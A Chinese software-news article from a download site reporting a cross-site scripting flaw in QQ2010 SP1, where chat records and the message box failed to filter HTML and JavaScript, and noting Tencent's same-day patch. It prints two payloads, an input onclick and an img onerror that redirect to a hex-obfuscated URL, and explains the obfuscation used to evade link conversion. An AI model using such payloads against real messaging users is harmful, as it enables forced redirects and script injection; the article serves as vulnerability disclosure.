软件下载 | 资讯教程 | 最近更新 | 下载排行 | 一键转帖 | 发布投稿
您的位置:最火下载站 > 资讯阅读 > 软件资讯 > QQ2010SP1出现严重漏洞 腾讯悄悄迅速修复

QQ2010SP1出现严重漏洞 腾讯悄悄迅速修复

  关于新版本QQ2010 SP1的漏洞,大家还没有来的及细细研究,腾讯就已经修复了,腾讯的危机应急能力真的很高。在14:56:32秒已经打包新版本并在首页提供下载。一个小风波就在几个小时静悄悄的来,静悄悄的走了。

  希望腾讯以后也不要犯低级错误咯,如果还发现有Bug,可以重新下载QQ2010 SP1。

 

  从图中可以看到MsgMgr.dll是元凶,已经在14:02:54秒重新签名,漏洞提交给腾讯为早上9点。

  相关链接:最新版腾讯QQ2010SP1出现严重漏洞

  注意,本代码仅供研究之用,请勿用于不当用途,否则后果自负。

  腾讯QQ一向是腾讯主打的产品,意想不到前天发布的QQ2010SP1竟然有如此大漏洞。

  首先囧一下:脚本出错还会提示错误

  1、消息记录的Javascript、Html标签没有屏蔽

  2、消息盒子Javascript、Html标签没有屏蔽

  3、小实验

  1、发送代码:<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />

  因为腾讯会自动将url转换,我们必须混淆url才能发送

 

  4、超牛代码

  <img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>

  因为要点击才能触发,想到一个不用点击就能触发的代码。

  5、希望腾讯快点修复,这个漏洞非同小可

  6、本漏洞由TGL发现。

    相关阅读
    栏目导航
    推荐软件